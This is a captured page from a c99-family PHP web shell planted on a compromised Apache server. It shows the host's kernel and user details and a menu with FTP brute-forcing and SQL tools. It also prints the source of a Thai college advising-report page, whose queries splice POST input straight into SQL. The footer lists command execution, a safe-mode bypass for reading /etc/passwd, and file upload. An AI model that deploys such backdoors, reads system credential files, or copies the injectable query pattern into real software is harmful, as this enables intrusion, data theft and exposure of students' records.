!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/reportEregis111/   drwxr-xr-x
Free 51.23 GB of 127.8 GB (40.08%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     dataReportperson.php (6.7 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<meta name="viewport" content="width=device-width, initial-scale=1" charset="x-windows-874">
<link rel="stylesheet" href="css/pure-min.css">
<link rel="stylesheet" href="css/style.css">
<link rel="stylesheet" href="//code.jquery.com/ui/1.12.1/themes/base/jquery-ui.css">
<link rel="stylesheet" href="/resources/demos/style.css">
<script src="https://code.jquery.com/jquery-1.12.4.js"></script>
<script src="https://code.jquery.com/ui/1.12.1/jquery-ui.js"></script>

<link rel="stylesheet" href="Chose/docsupport/style.css">
    <link rel="stylesheet" href="Chose/docsupport/prism.css">
    <link rel="stylesheet" href="Chose/chosen.css">

<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css" integrity="sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T" crossorigin="anonymous">
<link rel="stylesheet"
          href="https://fonts.googleapis.com/css?family=Tangerine">
    <style>
      body {
        font-family: 'Kanit', sans-serif;
        font-size: 15px;
      }
    </style>
    
<script>
    $( function() {
        $( "#datepicker1" ).datepicker();
        $( "#datepicker2" ).datepicker();
    } );
</script>
<style type="text/css">
    @font-face {
        font-family: cha;
        src: url(/font/THSarabunNew.ttf);
    }
    html, body {
        padding:0px;
        margin:0px;
        height:100%;
        font-family: cha;
    }
</style>
<?php
$dateSet
=date("Y")+543;
include_once(
"classes/Crud.php");
$crud = new Crud();
?>
<nav class="navbar navbar-light bg-info">
  <a class="navbar-brand" href="#"> 
    <img src="img_logo.png" width="40" height="40" alt=""> <font style="color:white; font-size:20px"> RepEis </font> <font style="color:white; font-size:10px"> www.knc.ac.th </font>
  </a>
</nav>
<br>
<h4 align="center"><font color="blue">รายงานการให้คำปรึกษารายอาจารย์(ค้นจากบุคคลและภาคการศึกษา)</font></h4>
<form name="senData" method="post" action="" class="pure-form">
<table class="table">
  <thead class="table-primary">
    <tr>
      <th class="text-center">
      <label>เลือกชื่ออาจารย์</label>
          <select data-placeholder="เลือกเพื่อคนหา" class="chosen-select" tabindex="3" name="teacher" >
        <option value=""  class="text-left"></ption>      
        <?php
        $queryDname 
"SELECT DISTINCT nameTeacher, userID FROM consulting ORDER BY nameTeacher ASC";
        
$resultDname $crud->getData($queryDname);
        foreach (
$resultDname as $key => $resDname) {
        
?>      
        <option value="<?=$resDname['userID']?>"  class="text-left"><?=$resDname['userID']?> || <?=$resDname['nameTeacher']?></option>
        <?php
        
}
        
?>
        </select>
        <label>เลือกปีการศึกษา</label>
          <select data-placeholder="เลือกเพื่อคนหา" class="chosen-select" tabindex="3" name="term" >
        <option value=""  class="text-left"></option>
        <?php
        $queryYear 
"SELECT DISTINCT academic_year FROM v_detailData ORDER BY academic_year DESC";
        
$resultYear $crud->getData($queryYear);
        foreach (
$resultYear as $key => $resYear) {
        
?>      
        <option value="<?=$resYear['academic_year']?>"  class="text-left"><?=$resYear['academic_year']?></option>
        <?php
        
}
        
?>
        </select>
        &nbsp;&nbsp;<input type="submit" name="submit" value="ค้นหาข้อมูล" class="btn btn-dark">   
      </th>
    </tr>
  </thead>

</table>

</form>
    <?php
    
if($_POST['teacher']!="" && $_POST['term']!=""  ){
    
$teacher=$_POST['teacher'];
    
$term=$_POST['term'];
    
$no 1;
    
$queryTeacher "SELECT * FROM Officer WHERE officerCode='$teacher' ";
    
$resultTeacher $crud->getData($queryTeacher);
    foreach(
$resultTeacher as $key => $resTeacher){
            
$officerName=$resTeacher['officerName']." ".$resTeacher['officerSurname'];
    }
    
$query "SELECT * FROM v_detailData WHERE  userID='$teacher' AND academic_year='$term' ";
    
$result $crud->getData($query);

    
?>
<center>
    <h4><font color="blue">ข้อมูลการให้คำปรึกษาของ อ. <?=$officerName?>   ปีการศึกษา <?=$term?></font></h4>
    <table class="pure-table pure-table-bordered" width="100%">
        <thead>
        <tr>
            <th align="center" valign="middle"><center>ลำดับ</center></th>
            <th align="center" valign="middle"><center>ปี</center></th>
            <th align="center" valign="middle"><center>ครั้ง</center></th>
            <th align="center" valign="middle"><center>เทอม</center></th>
            <th align="center" valign="middle">รายชื่อนักศึกษาที่เข้าร่วม</th>
            <th align="center" valign="middle"><center>ผลการให้คำปรึกษา</center></th>
            <th align="center" valign="middle"><center>วันที่</center></th>
        </tr>
        </thead>
        <tbody>
        <?php
        
foreach ($result as $key => $res) {
            
?>
            <tr>
                <td align="center" valign="top"><?= $no ?></td>
                <td align="center" valign="top"><?= $res['academic_year'?></td>
                <td align="center" valign="top"><?= $res['round'?></td>
                <td align="center" valign="top"><?= $res['term'?></td>
                <td class="text-left"><?=nl2br(convertName($res['per1']).",".convertName($res['per2']).",".convertName($res['per3']).",".convertName($res['per4']).",".convertName($res['per5']).",".convertName($res['per6']).",".convertName($res['per7']).",".convertName($res['per8']).",".convertName($res['per9']).",".convertName($res['per10']).",".convertName($res['per11']).",".convertName($res['per12']).",".convertName($res['per13']).",".convertName($res['per14']).",".convertName($res['per15']).",".convertName($res['per16']).",".convertName($res['per17']).",".convertName($res['per18']).",".convertName($res['per19']).",".convertName($res['per20']))?></td>
                  <td class="text-left"><?=nl2br($res['result'])?></td>
              <td class="text-left"><?=DateThai($res['proDate'])?></td>
            </tr>
            <?php
            $no
++;
        }
        
?>

        </tbody>
    </table>
    <?php
    
}else{
        echo 
"<h3 align='center'><font color='red'>ท่านยังไม่ได้เลือกค้นจากบุคคลและภาคการศึกษาในการดูข้อมูล</font> </h3>";
    }
    
?>
</center>
<?php
function DateThai($strDate)
{
    
$strYear date("Y",strtotime($strDate))+543;
    
$strMonthdate("n",strtotime($strDate));
    
$strDaydate("j",strtotime($strDate));
    
$strHourdate("H",strtotime($strDate));
    
$strMinutedate("i",strtotime($strDate));
    
$strSecondsdate("s",strtotime($strDate));
    
$strMonthCut = Array("","ม.ค.","ก.พ.","มี.ค.","เม.ย.","พ.ค.","มิ.ย.","ก.ค.","ส.ค.","ก.ย.","ต.ค.","พ.ย.","ธ.ค.");
    
$strMonthThai=$strMonthCut[$strMonth];
    return 
"$strDay $strMonthThai $strYear $strHour:$strMinute:$strSeconds";
}
function 
convertName($id)
{
    
$crud = new Crud();
    
$query "SELECT * FROM Student WHERE studentId='$id' ";
    
$result $crud->getData($query);
    foreach(
$result as $key => $res){
    
$studentName=$res['prefixName'].$res['studentName']." ".$res['studentSurname'];
    }
    return 
$studentName;
}
?>

<!-- Chose -->
<script src="Chose/docsupport/jquery-3.2.1.min.js" type="text/javascript"></script>
  <script src="Chose/chosen.jquery.js" type="text/javascript"></script>
  <script src="Chose/docsupport/prism.js" type="text/javascript" charset="utf-8"></script>
  <script src="Chose/docsupport/init.js" type="text/javascript" charset="utf-8"></script>

  

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0153 ]--